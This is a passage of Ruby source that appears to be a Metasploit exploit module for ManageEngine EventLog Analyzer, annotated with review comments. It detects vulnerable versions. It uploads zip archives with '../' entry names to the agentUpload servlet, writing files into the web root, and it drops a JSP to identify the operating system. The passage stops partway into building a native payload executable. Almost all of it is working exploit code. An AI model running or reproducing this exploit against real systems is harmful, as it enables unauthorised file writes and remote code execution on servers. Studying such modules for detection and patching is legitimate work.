# Fetches the EventLog Analyzer landing page and extracts the major version
# digit from the product banner.
#
# @return [String] the single captured version digit, or "0" when there is
#   no response, the status is not 200, or the banner is not in the body
def get_version
  request = {
    'uri' => normalize_uri("event/index3.do"),
    'method' => 'GET'
  }
  response = send_request_cgi(request)

  # No reply or a non-200 status is reported as "version unknown".
  return "0" unless response && response.code == 200

  # Only one digit is captured, so minor releases (8.0 vs 8.1) cannot be
  # told apart from this banner alone.
  banner_pos = response.body =~ /ManageEngine EventLog Analyzer ([0-9]{1})/
  banner_pos ? Regexp.last_match(1) : "0"
end
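# Probes the target with GET requests only (no upload) to judge whether the
# agentUpload servlet is present on a version in the affected range.
#
# The decision is based on the banner digit from get_version and on whether
# a GET to the upload servlet answers with HTTP 405.
# NOTE(review): 405 presumably means the servlet is mapped but accepts POST
# only - confirm against the product.
#
# @return [Exploit::CheckCode::Safe] banner version outside "7".."9"
# @return [Exploit::CheckCode::Appears] 405 on event/agentUpload, or 405 on
#   agentUpload with banner version "8"
# @return [Exploit::CheckCode::Detected] version in range but no conclusive
#   405 signal (includes every version "9" result from the second probe)
def check
  version = get_version
  # get_version returns a one-character String, so these are string compares.
  return Exploit::CheckCode::Safe if version < "7" || version > "9"

  # version 7 to < 8.1 detection
  legacy_probe = send_request_cgi({
    'uri' => normalize_uri("event/agentUpload"),
    'method' => 'GET'
  })
  return Exploit::CheckCode::Appears if legacy_probe && legacy_probe.code == 405

  # version 8.1+ detection
  current_probe = send_request_cgi({
    'uri' => normalize_uri("agentUpload"),
    'method' => 'GET'
  })

  # Compare against the String "8": the previous Integer 8 could never equal
  # the String returned by get_version, so this branch was unreachable and
  # 8.1+ hosts were always reported as Detected.
  if current_probe && current_probe.code == 405 && version == "8"
    Exploit::CheckCode::Appears
  else
    # We can't be sure that it is vulnerable in version 9
    Exploit::CheckCode::Detected
  end
end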
# Wraps +payload+ in a single-entry zip archive and POSTs it as multipart
# form data to the agentUpload servlet.
#
# The zip entry name is +target_path+ as given; callers in this file pass a
# path containing "../" segments. On the wire this is a multipart POST to
# agentUpload (or /event/agentUpload) with an application/zip part, which is
# the request shape to look for in web server logs.
#
# @param payload [String] contents of the file placed inside the archive
# @param target_path [String] entry name stored in the archive
# @param is_payload [Boolean] when true, progress messages are printed
# @return [Boolean] true if the server answered 200 with an empty body,
#   false otherwise
def create_zip_and_upload(payload, target_path, is_payload = true)
  # Zipping with CM_STORE to avoid errors decompressing the zip
  # in the Java vulnerable application
  archive = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
  archive.add_file(target_path, payload)

  form = Rex::MIME::Message.new
  packed = archive.pack
  # Form field name and zip file name are random 4-7 letter strings.
  field_name = Rex::Text.rand_text_alpha(4+rand(4))
  zip_name = Rex::Text.rand_text_alpha(4+rand(4))
  disposition = "form-data; name=\"#{field_name}\"; filename=\"#{zip_name}.zip\""
  form.add_part(packed, "application/zip", 'binary', disposition)
  body = form.to_s

  print_status("#{peer} - Uploading payload...") if is_payload

  # targets[1] uses the servlet under /event/; every other target uses the
  # root-level path.
  upload_path = @my_target == targets[1] ? "/event/agentUpload" : "agentUpload"
  response = send_request_cgi({
    'uri' => normalize_uri(upload_path),
    'method' => 'POST',
    'data' => body,
    'ctype' => "multipart/form-data; boundary=#{form.bound}"
  })

  # Success is a 200 reply with an empty body; anything else is a failure.
  return false unless response && response.code == 200 && response.body.empty?

  print_status("#{peer} - Payload uploaded successfully") if is_payload
  # The cleanup path drops one directory level from the upload path.
  register_files_for_cleanup(target_path.gsub("../../", "../"))
  true
end
# Resolves the 'Automatic' target to a concrete entry of +targets+.
#
# A target chosen explicitly by the operator is returned unchanged. Otherwise
# the banner version is read, and for versions other than "7" a small JSP
# that prints the JVM's os.name property is uploaded and then requested.
# Note that automatic selection therefore writes a file to the server before
# the main payload is sent; create_zip_and_upload registers it for cleanup.
#
# @return [Object, nil] the selected target, or nil when the target could
#   not be determined
def pick_target
  return target if target.name != 'Automatic'

  print_status("#{peer} - Determining target")
  detected_version = get_version
  return targets[1] if detected_version == "7"

  os_probe_jsp = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
  probe_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
  webapp_dir = "../../webapps/event/"

  unless create_zip_and_upload(os_probe_jsp, webapp_dir + probe_name, false)
    # Versions < 8.1 do not have a Java compiler, but can be exploited via the EAR method
    return detected_version == "8" ? targets[1] : nil
  end

  probe_response = send_request_cgi({
    'uri' => normalize_uri(probe_name),
    'method' => 'GET'
  })
  return nil unless probe_response && probe_response.code == 200

  # Anything that does not report "Windows" is assumed to be Linux.
  probe_response.body.to_s =~ /Windows/ ? targets[2] : targets[3]
end
def generate_jsp_payload
opts = {:arch => @my_target.arch, :platform => @my_target.platform}
payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
exe = generate_payload_exe(opts)
base64_exe = Rex::Text.encode_base64(exe)
native_payload_name = rand_text_alpha(rand(6)+3)
ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'